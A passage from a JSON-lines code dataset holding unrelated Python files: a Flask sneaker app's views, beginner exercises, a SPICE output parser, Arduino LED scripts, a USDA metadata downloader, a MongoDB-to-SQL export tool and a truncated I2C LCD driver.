price, current_user.id, form.sneaker_public.data, filename, url)\n \n db.session.add(new_sneaker)\n db.session.commit()\n flash('New sneaker, {}, added!'.format(new_sneaker.sneaker_model_name), 'success')\n return redirect(url_for('sneakers.user_sneakers'))\n else:\n flash_errors(form)\n flash('ERROR! Sneaker was not added.', 'error')\n\n return render_template('add_sneaker.html', form=form)\n\n\n@sneakers_blueprint.route('/sneakers')\n@login_required\ndef user_sneakers():\n all_user_sneakers = Sneaker.query.filter_by(user_id=current_user.id)\n return render_template('user_sneakers.html', user_sneakers=all_user_sneakers)\n\n\n@sneakers_blueprint.route('/sneaker/')\ndef sneaker_details(sneaker_id):\n # sneaker_with_user = db.session.query(Sneaker, User).join(User).filter(Sneaker.id == sneaker_id).first()\n sneaker = Sneaker.query.filter_by(id=sneaker_id).first_or_404()\n \n # if sneaker_with_user is not None:\n if sneaker.is_public:\n return render_template('sneaker_detail.html', sneaker=sneaker)\n else:\n if current_user.is_authenticated and sneaker.user_id == current_user.id:\n return render_template('sneaker_detail.html', sneaker=sneaker)\n else:\n flash('Error! Incorrect permissions to access this sneaker.', 'error')\n\n return redirect(url_for('sneakers.public_sneakers'))\n\n\n@sneakers_blueprint.route('/delete/')\n@login_required\ndef delete_sneaker(sneaker_id):\n sneaker = Sneaker.query.filter_by(id=sneaker_id).first_or_404()\n\n if not sneaker.user_id == current_user.id:\n flash('Error! Incorrect permissions to delete this sneaker.', 'error')\n return redirect(url_for('sneakers.public_sneakers'))\n\n db.session.delete(sneaker)\n db.session.commit()\n flash('{} was deleted.'.format(sneaker.sneaker_model_name), 'success')\n return redirect(url_for('sneakers.user_sneakers'))\n\n\n@sneakers_blueprint.route('/edit/', methods=['GET', 'POST'])\n@login_required\ndef edit_sneaker(sneaker_id):\n # Cannot pass in 'request.form' to EditRecipeForm constructor, as this will cause 'request.files' to not be\n # sent to the form. This will cause RecipeForm to not see the file data.\n # Flask-WTF handles passing form data to the form, so not parameters need to be included.\n form = EditSneakerForm()\n sneaker = Sneaker.query.filter_by(id=sneaker_id).first_or_404()\n\n if not sneaker.user_id == current_user.id:\n flash('Error! Incorrect permissions to edit this sneaker.', 'error')\n return redirect(url_for('sneakers.public_sneakers'))\n\n if request.method == 'POST':\n if form.validate_on_submit():\n update_counter = 0\n\n if form.sneaker_model_name.data is not None and form.sneaker_model_name.data != sneaker.sneaker_model_name:\n flash('DEBUG: Updating sneaker.sneaker_model_name to {}.'.format(form.sneaker_model_name.data), 'debug')\n update_counter += 1\n sneaker.sneaker_model_name = form.sneaker_model_name.data\n\n if form.sneaker_retail_price.data is not None and form.sneaker_retail_price.data != sneaker.sneaker_retail_price:\n flash('DEBUG: Updating sneaker.sneaker_retail_price to {}.'.format(form.sneaker_retail_price.data), 'debug')\n update_counter += 1\n sneaker.sneaker_retail_price = form.sneaker_retail_price.data\n\n if form.sneaker_public.data != sneaker.is_public:\n flash('DEBUG: Updating sneaker.is_public to {}.'.format(form.sneaker_public.data), 'debug')\n update_counter += 1\n sneaker.is_public = form.sneaker_public.data\n\n if form.sneaker_image.has_file():\n flash('DEBUG: Updating sneaker.image_filename to {}.'.format(form.sneaker_image.data), 'debug')\n update_counter += 1\n file = request.files['sneaker_image']\n filename = secure_filename(file.filename)\n file.save(os.path.join(app.config['UPLOADED_IMAGES_DEST'], filename))\n url = os.path.join(app.config['UPLOADED_IMAGES_URL'], filename)\n sneaker.image_filename = filename\n sneaker.image_url = url\n\n if update_counter > 0:\n db.session.add(sneaker)\n db.session.commit()\n flash('Sneaker has been updated for {}.'.format(sneaker.sneaker_model_name), 'success')\n else:\n flash('No updates made to the sneaker ({}). Please update at least one field.'.format(sneaker.sneaker_model_name), 'error')\n\n return redirect(url_for('sneakers.sneaker_details', sneaker_id=sneaker_id))\n else:\n flash_errors(form)\n flash('ERROR! Sneaker was not edited.', 'error')\n\n return render_template('edit_sneaker.html', form=form, sneaker=sneaker)\n\n\n@sneakers_blueprint.route('/admin/delete/')\n@login_required\ndef admin_delete_sneaker(sneaker_id):\n sneaker = Sneaker.query.filter_by(id=sneaker_id).first_or_404()\n\n if not current_user.role == 'admin':\n flash('Error! Incorrect permissions to delete this sneaker.', 'error')\n return redirect(url_for('sneakers.public_sneakers'))\n\n db.session.delete(sneaker)\n db.session.commit()\n flash('{} was deleted.'.format(sneaker.sneaker_model_name), 'success')\n return redirect(url_for('sneakers.admin_view_sneakers'))\n\n\n@sneakers_blueprint.route('/admin/edit/', methods=['GET', 'POST'])\n@login_required\ndef admin_edit_sneaker(sneaker_id):\n # Cannot pass in 'request.form' to EditRecipeForm constructor, as this will cause 'request.files' to not be\n # sent to the form. This will cause RecipeForm to not see the file data.\n # Flask-WTF handles passing form data to the form, so not parameters need to be included.\n form = EditSneakerForm()\n sneaker = Sneaker.query.filter_by(id=sneaker_id).first_or_404()\n\n if current_user.role != 'admin':\n abort(403)\n\n if request.method == 'POST':\n if form.validate_on_submit():\n sneaker.import_form_data(request, form)\n db.session.add(sneaker)\n db.session.commit()\n flash('Sneaker has been updated for {}'.format(sneaker.sneaker_model_name), 'success')\n return redirect(url_for('sneakers.admin_view_sneakers'))\n else:\n flash_errors(form)\n flash('ERROR! Sneaker was not edited.', 'error')\n\n return render_template('admin_edit_sneaker.html', form=form, sneaker=sneaker)\n\n\n@sneakers_blueprint.route('/admin_view_sneakers')\n@login_required\ndef admin_view_sneakers():\n if current_user.role != 'admin':\n abort(403)\n else:\n sneakers = Sneaker.query.order_by(Sneaker.id).all()\n return render_template('admin_view_sneakers.html', sneakers=sneakers)\n return redirect(url_for('users.login'))\n\n\n\n#POST method is to allow the user to submit the form data\n#GET method is to allow the user to receive the form\n@sneakers_blueprint.route('/pred', methods=['GET', 'POST'])\ndef pred_price():\n # Cannot pass in 'request.form' to AddSneakerForm constructor, as this will cause 'request.files' to not be\n # sent to the form. This will cause AddSneakerForm to not see the file data.\n # Flask-WTF handles passing form data to the form, so not parameters need to be included.\n form = PredPriceForm()\n if request.method == 'POST':\n if form.validate_on_submit():\n # check if the post request has the recipe_image part\n if 'sneaker_image' not in request.files:\n flash('No sneaker image provided!')\n return redirect(request.url)\n\n file = request.files['sneaker_image']\n\n if file.filename == '':\n flash('No selected file')\n return redirect(request.url)\n\n if not file:\n flash('File is empty!')\n return redirect(request.url)\n\n if file and allowed_file(file.filename):\n filename = secure_filename(file.filename)\n filepath = os.path.join(app.config['UPLOADS_DEFAULT_DEST'], filename)\n file.save(filepath)\n url = os.path.join(app.config['UPLOADS_DEFAULT_URL'], filename)\n else:\n filename = ''\n url = ''\n\n name = form.sneaker_model_name.data\n price = form.sneaker_retail_price.data\n\n # new_sneaker = Sneaker(name, \n # price, \n # filename, \n # url)\n\n # db.session.add(new_sneaker)\n # db.session.commit()\n # flash('New sneaker, {}, added!'.format(new_sneaker.sneaker_model_name), 'success')\n \n pred, proba = classify(price, filepath, name)\n \n return render_template('results.html', \n content_name=name, \n content_price=price,\n prediction=pred, \n probability=round(proba*100, 2))\n\n else:\n flash_errors(form)\n flash('ERROR! Sneaker was not added.', 'error')\n \n return render_template('pred_price.html', form=form)\n\n","sub_path":"web/project/sneakers/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":13111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"428779416","text":"# Comentario de linha\n# aula 03 exemplo 01\n# Cacio\n\nx = int(input(\"Digite o primeiro valor: \"))\nsinal = input(\"Digite um sinal? \")\ny = int(input(\"Digite o segundo valor: \"))\np = 0\nwhile sinal != 'false' :\n if sinal == '+':\n p = x + y;\n sinal = 'false'\n print('A soma dos dois numeros É:',p)\n elif (sinal == '-'):\n p = x - y;\n print('A soma dos dois numeros É:',p)\n sinal = 'false'\n elif(sinal == '/'):\n p = x / y;\n print('A soma dos dois numeros É:',p)\n sinal = 'false'\n elif (sinal == '*'):\n p = x * y;\n print('A soma dos dois numeros É:',p)\n sinal = 'false'\n else:\n print('gite um operador valido')\n sinal = 'false'\n \n sinal = input(\"Digite um sinal? \")\n \n","sub_path":"Logica Programacao/aula03.py","file_name":"aula03.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"347131591","text":"import random\r\ndef prime(n):\r\n count=0\r\n for i in range(2,n+1):\r\n if n%i==0:\r\n count+=1\r\n if count==1:\r\n return (1)\r\n else:\r\n return (0)\r\nn=int(input(\"Enter a number:\"))\r\ndef before_prime(n):\r\n while n>1:\r\n if prime(n-1)==1:\r\n return n-1 \r\n else :\r\n n=n-1\r\nspl_p_l=[]\r\nnum=n\r\nwhile num>2:\r\n spl_p_l.append(before_prime(num))\r\n num-=1\r\nspl=list(set(spl_p_l))\r\nprint(spl)\r\n\r\n \r\n","sub_path":"customized_prime_numbers_list.py","file_name":"customized_prime_numbers_list.py","file_ext":"py","file_size_in_byte":465,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"206161520","text":"# Parse the SPICE raw output to extract dataset and pickle it\n\nimport itertools as it\nimport re\n\nimport numpy as np\n\nfrom dataset import MyDataset\nfrom utils import pkl_dump\n\nshuffle_array = MyDataset.shuffle_seq\nsplit_array = MyDataset.split_seq\n\nregx = re.compile(r'\\t(\\d\\.\\d+e[+-]\\d+)\\n')\nwith open('FET.raw', 'r') as f:\n line_iter = iter(f.readlines())\n\nmatched = map(regx.findall, line_iter)\nchain = it.chain.from_iterable(filter(lambda x: x, matched))\ndataset = np.fromiter(chain, np.float32).reshape((-1, 16, 16))\n\n# pp(train_dataset[0:2])\nnum_loop = 10\nrange_labels = \\\n (3.593e+2, 6.250e+1), \\\n (6.562e+4, 9.812e+4), \\\n (5.390e-2, 9.109e-2), \\\n (5.468e-2, -6.25e-2)\n\n# list_labels = [[lwr + i * (upp - lwr) / (num_loop - 1) for i in range(num_loop)] for lwr, upp in range_labels]\n# list_labels = (it.islice(it.count(low, (upp - low) / (num_loop - 1)), num_loop) for low, upp in range_labels)\nlist_labels = (np.linspace(low, upp, num_loop) for low, upp in range_labels)\nlabels = np.asarray(list(it.product(*list_labels)), np.float32)\n# pp(train_labels)\n\n\n# pkl_dump(((train_dataset, valid_dataset), (train_labels, valid_labels)), 'BSIM4_dataset')\npkl_dump((dataset, labels), 'pkls/BSIM4_dataset.pkl')\n","sub_path":"model_fitting/data/first_grid_10k/spice_parsing.py","file_name":"spice_parsing.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"239834892","text":"#!/usr/bin/env python\n\n#from pyfirmata import Arduino\n#import pyfirmata\n#from time import sleep\n\n#board = pyfirmata.Arduino('/dev/ttyUSB0')\n#it = pyfirmata.util.Iterator(board) # para portas analogicas\n#it.start()\n\n#port = '/dev/ttyACM0' # Leonardo\n#port = '/dev/ttyUSB0' # Uno\n#board = Arduino(port)\n\n#board.digital_write(17, firmata.HIGH)\n#board.delay(2)\n\n#for i in range(50):\n #board.digital[8].write(1) # ON\n #sleep(0.1)\n #board.digital[8].write(0) # OFF\n #sleep(0.1)\n\n#board.exit()\n\n##Piscando led com python\n##importando a biblioteca FIRMATA\nfrom pyfirmata import *\n##conectando ao arduino\na = Arduino('/dev/ttyUSB0', baudrate=57600)\n##especificando o modo que o pino 13 irá trabalhar\n#a.pin_mode(13, firmata.OUTPUT)\n##Delay de 2 segundos\n#a.delay(2)\n\nwhile True:\n ##Colocando 1 na saida digital 13, neste caso 5 volts\n a.digital_write(17, firmata.HIGH)\n a.digital_write(8, firmata.HIGH)\n #a.delay(2)\n ##Colocando 0 na saida digital 13, neste caso 0 volts\n #a.digital_write(8, firmata.LOW)\n #a.delay(2)","sub_path":"www/arduino/scripts/shield.py","file_name":"shield.py","file_ext":"py","file_size_in_byte":1042,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"643893801","text":"# https://www.hackerearth.com/practice/data-structures/trees/heapspriority-queues/tutorial/\ninputs = iter([\n \"5\",\n \"1 2 3 4 5\",\n \"4\",\n \"1 1\",\n \"1 2\",\n \"1 3\",\n \"2\"\n])\n\nimport math\n\ndef next_line():\n return next(inputs)\n\nN = int(next_line())\nA = [int(x) for x in next_line().split(\" \")]\nA.insert(0, 0)\nq = int(next_line())\n\ndef swap(arr, i, j):\n arr[i], arr[j] = arr[j], arr[i]\n\ndef construct_max_heap(arr, N):\n for i in range(math.floor(N/2), 0, -1):\n # Start heapifying from above leaf nodes, bottoms up\n max_heapify(arr, i, N)\n\ndef max_heapify(arr, i, N):\n left = i*2\n right = i*2+1\n largest = i\n if left <= N and arr[left] > arr[largest]:\n largest = left\n if right <= N and arr[right] > arr[largest]:\n largest = right\n if largest != i:\n swap(arr, i, largest)\n max_heapify(arr, largest, N)\n\ndef increase_value(arr, i, v):\n if v < arr[i]:\n print(\"Unable to increase value, {} is smaller than {}\".format(v, arr[i]))\n else:\n arr[i] = v\n while i > 1 and arr[int(i/2)] < v:\n swap(arr, int(i/2), i)\n i = int(i/2)\n\ndef add(arr, v):\n arr.append(-1)\n i = len(arr) - 1\n increase_value(arr, i, v)\n\ndef maximum(arr):\n return arr[1]\n\nconstruct_max_heap(A, N)\n\nfor i in range(q):\n c = [int(x) for x in next_line().split(\" \")]\n if c[0] == 1:\n add(A, c[1])\n else:\n m = maximum(A)\n print(m)\n","sub_path":"data-structures/max-heap-priority-queue.py","file_name":"max-heap-priority-queue.py","file_ext":"py","file_size_in_byte":1346,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"561542865","text":"from time import time\nfrom pandas import DataFrame, concat, read_csv\nimport os\nimport urllib.request\nfrom json import loads\n\n#Files created in 'resources/':\n #adc_metadata.csv\n #pubag_metadata_text.csv, pubag_metadata_other.csv\n\ndef get_adc():\n #download AgDataCommons metadata\n directory = 'resources/'\n fn = 'adc_metadata.csv'\n\n if not os.path.exists(directory):\n os.makedirs(directory)\n\n if not os.path.exists(directory+fn):\n url = 'https://data.nal.usda.gov/data.json'\n print('Downloading metadata....')\n \n try:\n f = urllib.request.urlopen(url, timeout=60).read()\n data = loads(f)['dataset']\n data = DataFrame(data)\n\n data.to_csv(directory+fn, index=False)\n print('Download successful')\n return True\n except:\n print('Timeout: Data not downloaded')\n return False\n \n print('ADC metadata already exists')\n return False\n\ndef format_time(eta):\n #convert seconds to hh:mm:ss\n h = int(eta // 3600)\n eta = eta - 3600 * h\n m = int(eta // 60)\n eta = eta - 60 * m\n formatted = str(h) + 'h:' + str(m) + 'm:' + str(int(eta)) + 's'\n return formatted\n\ndef get_pubag():\n #Download PubAg metadata in chunks, very long! save as 2 files\n\n api_url = 'https://pubag.nal.usda.gov/api/rest/search/?page={}&per_page=100'\n fn_text = 'resources/pubag_metadata_text.csv'\n fn_other = 'resources/pubag_metadata_other.csv'\n n_pubag = loads(urllib.request.urlopen(api_url).read())['hitCount']\n \n #Resume ongoing download if exists\n if os.path.exists('resources/temp/'):\n print('Resuming download....')\n pubag_download(api_url, n_pubag)\n return True\n \n #check for completeness\n if os.path.exists(fn_text) and os.path.exists(fn_other):\n n_file = 0\n for line in open(fn_text.format('')):\n n_file += 1\n \n if n_file / n_pubag >= .9:\n print('PubAg metadata exists and is mostly complete')\n return False\n else:\n print('Data incomplete. Re-downloading....')\n os.rename(fn_text, 'resources/pubag_metadata_text_old.csv')\n os.rename(fn_other, 'resources/pubag_metadata_other_old.csv')\n pubag_download(api_url, n_pubag)\n return True\n \ndef pubag_download(api_url, n_pubag):\n save_dir = 'resources/temp/'\n fn = '{}.csv'\n other_fields = ['id','timestamp','author','author_primary','subject','source','journal','date','publication_year','publication_year_rev','issn','type','volume','startpage','endpage','pageoffset','page','doi_url','doi','text_availability','language']\n text_fields = ['id', 'title', 'abstract']\n all_fields = other_fields + text_fields[1:]\n \n if not os.path.exists(save_dir):\n print('Creating temp directory')\n os.mkdir(save_dir)\n \n #get starting position\n get_page = (lambda x: int(x.replace('.csv', '')))\n pages = [get_page(fn) for fn in next(os.walk(save_dir))[2]]\n pages.append(0)\n start_page = max(pages) + 1\n last_page = n_pubag // 100 + 1\n \n #download\n print('Starting download from page {}'.format(start_page))\n for page in range(start_page, last_page):\n \n if page % 100 == 1:\n data = {}\n t0 = time()\n \n url = api_url.format(page)\n new_data = loads(urllib.request.urlopen(url).read())['resultList']\n for result in new_data:\n data[result['id']] = {(field): (result[field] if field in result else '') for field in all_fields}\n \n if page % 100 == 0:\n data = DataFrame.from_dict(data, orient='index')\n data.to_csv(save_dir + fn.format(page), index=False)\n \n eta = ((time() - t0)/100) * (last_page - page)\n eta = format_time(eta) \n print(' Progress: {}/{} --> ETA: {}'.format(page, last_page-1, eta))\n \n \n #combine and save\n print('Combining and cleaning temp data, do not interrupt')\n data = [read_csv(save_dir+fn) for fn in next(os.walk(save_dir))[2]]\n data = concat(data, axis=0, ignore_index=True)\n data.drop_duplicates(inplace=True)\n data[text_fields].to_csv('resources/pubag_metadata_text.csv')\n data[other_fields].to_csv('resources/pubag_metadata_other.csv')\n \n #cleanup\n for fn in next(os.walk(save_dir))[2]:\n os.remove(save_dir+fn)\n os.rmdir(save_dir)\n\n print('Done')\n return True\n\nget_adc()\nget_pubag()\n\n\n\n\n","sub_path":"word_vectors/python_scripts/gather_data.py","file_name":"gather_data.py","file_ext":"py","file_size_in_byte":4536,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"364632050","text":"# -*- coding: utf-8 -*-\n'''\nCreated on 2017-01-11 15:41\n---------\n@summary: mongo 导数据 到oracle 或 mysql\n---------\n@author: Boris\n'''\nimport sys\nsys.path.append('..')\nimport init\n\nfrom db.mongodb import MongoDB\nfrom db.oracledb import OracleDB\nfrom db.mysqldb import MysqlDB\nfrom utils.log import log\nimport utils.tools as tools\nimport os\nos.environ['nls_lang'] = 'AMERICAN_AMERICA.AL32UTF8' # 插入数据时编码错误 加上这句解决 设置客户端编码\n\nclass ExportData():\n def __init__(self, source_table = '', aim_table = '', key_map = '', unique_key = None, unique_key_mapping_source_key = None, update_read_status = True, condition = {'read_status':0}):\n '''\n @summary: 初始化\n ---------\n @param source_table: 源table\n @param aim_table: 目标table\n @param key_map: 目标table 和 源table 的键的映射\n eg: key_map = {\n 'aim_key1' : 'str_source_key2', # 目标键 = 源键对应的值 类型为str\n 'aim_key2' : 'int_source_key3', # 目标键 = 源键对应的值 类型为int\n 'aim_key3' : 'date_source_key4', # 目标键 = 源键对应的值 类型为date\n 'aim_key4' : 'vint_id', # 目标键 = 值 类型为int\n 'aim_key5' : 'vstr_name', # 目标键 = 值 类型为str\n 'aim_key6' : 'sint_select id from xxx' # 目标键 = 值为sql 查询出的结果 类型为int\n 'aim_key7' : 'sstr_select name from xxx' # 目标键 = 值为sql 查询出的结果 类型为str\n 'aim_key8' : 'clob_key8' # 目标键 = 源键对应的值 类型为str\n }\n\n @param unique_key: 唯一的key 目标数据库根据该key去重\n @param unique_key_mapping_source_key: 目标表中唯一的key所对应的源表中的key 该值不为空时 更新目标表中已有的数据\n eg: unique_key_mapping_source_key = {\n 'url':'str_url' # 目标键 = 源键对应的值 类型为str\n }\n @param condition: 导出满足什么样条件的数据 默认是read_status = 0 的\n ---------\n @result:\n '''\n\n super(ExportData, self).__init__()\n\n self._source_table = source_table\n self._aim_table = aim_table\n self._key_map = key_map\n self._unique_key = unique_key\n self._update_read_status = update_read_status\n self._condition = condition\n\n self._mongodb = MongoDB()\n\n self._is_oracle = False\n self._export_count = 0\n self._update_count = 0\n self._unique_key_mapping_source_key = unique_key_mapping_source_key\n\n\n def export_to_oracle(self, source_table = '', aim_table = '', key_map = '', unique_key = None, unique_key_mapping_source_key = None, update_read_status = True, condition = {'read_status':0}):\n if source_table:\n self._source_table = source_table\n self._aim_table = aim_table\n self._key_map = key_map\n self._unique_key = unique_key\n self._export_count = 0\n self._update_count = 0\n self._unique_key_mapping_source_key = unique_key_mapping_source_key\n self._update_read_status = update_read_status\n self._condition = condition\n\n self._aim_db = OracleDB()\n self._is_oracle = True\n self.__export()\n\n def export_to_mysql(self, source_table = '', aim_table = '', key_map = '', unique_key = None, unique_key_mapping_source_key = None, update_read_status = True, condition = {'read_status':0}):\n if source_table:\n self._source_table = source_table\n self._aim_table = aim_table\n self._key_map = key_map\n self._unique_key = unique_key\n self._export_count = 0\n self._update_count = 0\n self._unique_key_mapping_source_key = unique_key_mapping_source_key\n self._update_read_status = update_read_status\n self._condition = condition\n\n self._aim_db = MysqlDB()\n self.__export()\n\n # @tools.run_safe_model(__name__)\n def __export(self):\n if self._unique_key:\n self._aim_db.set_unique_key(self._aim_table, self._unique_key)\n\n aim_keys = tuple(self._key_map.keys())\n source_keys = tuple(self._key_map.values())\n\n # 取源key值 对应的type 和 key (源key包含type 和 key 信息)\n keys = []\n value_types = []\n for source_key in source_keys:\n temp_var = source_key.split('_', 1)\n value_types.append(temp_var[0])\n keys.append(temp_var[1])\n\n datas = self._mongodb.find(self._source_table, condition = self._condition)\n for data in datas:\n sql = 'insert into ' + self._aim_table + \" (\" + ', '.join(aim_keys) + \") values (\"\n update_sql = 'update ' + self._aim_table + \" set \"\n values = []\n for i in range(len(keys)):\n if value_types[i] == 'str':\n values.append(str(data[keys[i]]).replace(\"'\", \"''\"))# if isinstance(data[keys[i]], str) else data[keys[i]]) # 将单引号替换成两个单引号 否者sql语句语法出错\n sql += \"'%s', \"\n update_sql += aim_keys[i] + \" = '%s', \"%values[-1]\n\n elif value_types[i] == 'clob':\n text = str(data[keys[i]]).replace(\"'\", \"''\")\n if not text:\n sql += \"'%s', \"\n values.append(text)\n update_sql += aim_keys[i] + \" = '%s', \"%values[-1]\n else:\n values_ = tools.cut_string(text, 2000)\n\n clob_text = ''\n for value in values_:\n clob_text += \"to_clob('%s') || \"%value\n\n clob_text = clob_text[:-len(' || ')]\n values.append(clob_text)\n sql += \"%s, \"\n\n update_sql += aim_keys[i] + \" = %s, \"%values[-1]\n\n elif value_types[i] == 'int':\n if isinstance(data[keys[i]], int):\n values.append(data[keys[i]])\n sql += '%d, '\n update_sql += aim_keys[i] + \" = %d, \"%values[-1]\n elif isinstance(data[keys[i]], str):\n sql += '%s, '\n if data[keys[i]]:\n values.append(data[keys[i]])\n else:\n values.append('null')\n update_sql += aim_keys[i] + \" = %s, \"%values[-1]\n else: # _id\n values.append(int(str(data[keys[i]])[-6:], 16))\n sql += '%d, '\n update_sql += aim_keys[i] + \" = %d, \"%values[-1]\n\n elif value_types[i] == 'date':\n values.append(data[keys[i]].replace('年', '-').replace('月', '-').replace('日', ''))\n if self._is_oracle:\n format_date = 'yyyy-mm-dd hh24:mi:ss'[:len(values[-1]) if len(values[-1]) <= 10 else None]\n sql += \"to_date('%s','{}'), \".format(format_date)\n update_sql += aim_keys[i] + \"= to_date('%s','%s'), \"%(values[-1], format_date)\n else:\n sql += \"'%s', \"\n update_sql += aim_keys[i] + \" = '%s', \"%values[-1]\n\n elif value_types[i] == 'vint':\n values.append(keys[i])\n sql += '%s, '\n update_sql += aim_keys[i] + \" = %s, \"%values[-1]\n\n elif value_types[i] == 'vstr':\n values.append(keys[i])\n sql += \"'%s', \"\n update_sql += aim_keys[i] + \" = '%s', \"%values[-1]\n\n elif value_types[i] == 'sint':\n value = self._oracledb.find(keys[i], fetch_one = True)[0]\n values.append(value)\n sql += '%d, '\n update_sql += aim_keys[i] + \" = %d, \"%value\n\n elif value_types[i] == 'sstr':\n value = self._oracledb.find(keys[i], fetch_one = True)[0]\n values.append(value)\n sql += \"'%s', \"\n update_sql += aim_keys[i] + \" = '%s', \"%value\n\n else:\n log.error('%s不符合key_map规定格式'%value_types[i])\n return\n\n sql = sql[:-2] + \")\"\n sql = sql%tuple(values)\n\n if self._unique_key_mapping_source_key:\n aim_key = tuple(self._unique_key_mapping_source_key.keys())[0]\n\n value = tuple(self._unique_key_mapping_source_key.values())[0]\n temp_var = value.split('_', 1)\n\n source_key_types = temp_var[0]\n source_key = temp_var[1]\n\n if source_key_types == 'str':\n update_sql = update_sql[:-2] + \" where %s = '%s'\" %(aim_key, data[source_key])\n elif source_key_types == 'int':\n update_sql = update_sql[:-2] + \" where %s = %d\" %(aim_key, data[source_key])\n\n log.debug(sql)\n # tools.write_file(self._aim_table + '.txt', sql, 'w+')\n def exception_callfunc(e):\n if 'ORA-00001' in str(e):\n if self._update_read_status:\n self._mongodb.update(self._source_table, data, {'read_status':1})\n\n if self._aim_db.add(sql, exception_callfunc):\n self._export_count += 1\n if self._update_read_status:\n self._mongodb.update(self._source_table, data, {'read_status':1})\n\n elif self._unique_key_mapping_source_key:\n log.debug(update_sql)\n if self._aim_db.update(update_sql):\n self._update_count += 1\n if self._update_read_status:\n self._mongodb.update(self._source_table, data, {'read_status':1})\n\n\n\n log.debug('''\n 共导出%d条数据\n 共更新%d条数据\n '''%(self._export_count, self._update_count))\n\n def close(self):\n self._aim_db.close()\n\n\nif __name__ == '__main__':\n task_id = 22\n\n key_map = {\n 'program_id': 'vint_sequence.nextval',\n 'search_type': 'int_search_type',\n 'program_name': 'str_title',\n 'program_url': 'str_url',\n 'release_date': 'date_release_time',\n 'image_url': 'str_image_url',\n 'program_content':'str_content',\n 'task_id': 'vint_%d'%task_id,\n 'keyword':'str_keyword',\n 'keyword_count':'int_keyword_count',\n 'check_status':'vint_202'\n }\n\n # export = ExportData('VA_content_info', 'tab_ivms_program_info', key_map, 'program_url')\n # export.export_to_oracle()\n format_date = 'yyyy-mm-dd hh24:mi:ss'\n date_str = '2017'\n\n print(len('yyyy-mm-dd'))\n format_date = format_date[:len(date_str) if len(date_str) <= 10 else None]\n print(format_date)\n\n\n","sub_path":"utils/export_data.py","file_name":"export_data.py","file_ext":"py","file_size_in_byte":11355,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"50"} +{"seq_id":"270676186","text":"# Copyright 2013 Mark de Jong - Mark@mdejong.de\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom webiopi.utils import *\nfrom webiopi.utils.types import toint\nfrom webiopi.devices.i2c import I2C\nfrom time import sleep, localtime, strftime\n\n\nclass LCD6x20(I2C):\n\n # ----------------------------------------------------------------------\n # Constants\n\n # Port expander registers\n MCP23008_IODIR = 0x00\n MCP23008_IPOL = 0x01\n MCP23008_GPINTEN = 0x02\n MCP23008_DEFVAL = 0x03\n MCP23008_INTCON = 0x04\n MCP23008_IOCON = 0x05\n MCP23008_GPPU = 0x06\n MCP23008_INTF = 0x07\n MCP23008_INTCAP = 0x08\n MCP23008_GPIO = 0x09\n MCP23008_OLAT = 0x0A\n\n # LED backlight\n LCD_LED_OFF = 0x00\n LCD_LED_ON = 0x80\n\n LCD_DATA_E1 = 0x04\n LCD_DATA_E2 = 0x01\n LCD_DATA_RS = 0x02\n\n # LCD Commands\n LCD_CLEARDISPLAY = 0x01\n LCD_RETURNHOME = 0x02\n LCD_ENTRYMODESET = 0x04\n LCD_DISPLAYCONTROL = 0x08\n LCD_CURSORSHIFT = 0x10\n LCD_FUNCTIONSET = 0x20\n LCD_SETCGRAMADDR = 0x40\n LCD_SETDDRAMADDR = 0x80\n\n # Flags for display on/off control\n LCD_DISPLAYON = 0x04\n LCD_DISPLAYOFF = 0x00\n LCD_CURSORON = 0x02\n LCD_CURSOROFF = 0x00\n LCD_BLINKON = 0x01\n LCD_BLINKOFF = 0x00\n\n # Flags for display entry mode\n LCD_ENTRYRIGHT = 0x00\n LCD_ENTRYLEFT = 0x02\n LCD_ENTRYSHIFTINCREMENT = 0x01\n LCD_ENTRYSHIFTDECREMENT = 0x00\n\n # Flags for display/cursor shift\n LCD_DISPLAYMOVE = 0x08\n LCD_CURSORMOVE = 0x00\n LCD_MOVERIGHT = 0x04\n LCD_MOVELEFT = 0x00\n\n # DDRAM settings for BT62005\n KS0073_LINE1_START = 0x00\n KS0073_LINE2_START = 0x20\n KS0073_LINE3_START = 0x40\n KS0073_LINE4_START = 0x00\n KS0073_LINE5_START = 0x20\n KS0073_LINE6_START = 0x40\n\n\n # ----------------------------------------------------------------------\n # Constructor\n\n def __init__(self, slave=0x20):\n slave = toint(slave)\n I2C.__init__(self, slave)\n self.porta = self.LCD_LED_ON\n self.led = self.LCD_LED_ON\n self.writeRegister(self.MCP23008_IODIR, 0x00)\n self.writeRegisters( self.MCP23008_IODIR,\n [0b00000000, # IODIR\n 0b00000000, # IPOL\n 0b00000000, # GPINTEN\n 0b00000000, # DEFVAL\n 0b00000000, # INTCON\n 0b00000000, # IOCON\n 0b00000000, # GPPU\n 0b00000000, # INTF\n 0b00000000, # INTCAP\n self.porta | self.led, # GPIO\n self.porta | self.led ])# OLAT\n self.writeRegister( self.MCP23008_IOCON, 0x20 )\n self.displayshift = (self.LCD_CURSORMOVE |\n self.LCD_MOVERIGHT)\n self.displaymode = (self.LCD_ENTRYLEFT |\n self.LCD_ENTRYSHIFTDECREMENT)\n self.displaycontrol = (self.LCD_DISPLAYON |\n self.LCD_CURSOROFF |\n self.LCD_BLINKOFF)\n self.write_lcd(self.LCD_DATA_E1, 0x33) # Init\n self.write_lcd(self.LCD_DATA_E1, 0x32) # Init\n self.write_lcd(self.LCD_DATA_E1, 0x24) # 2 line 5x8 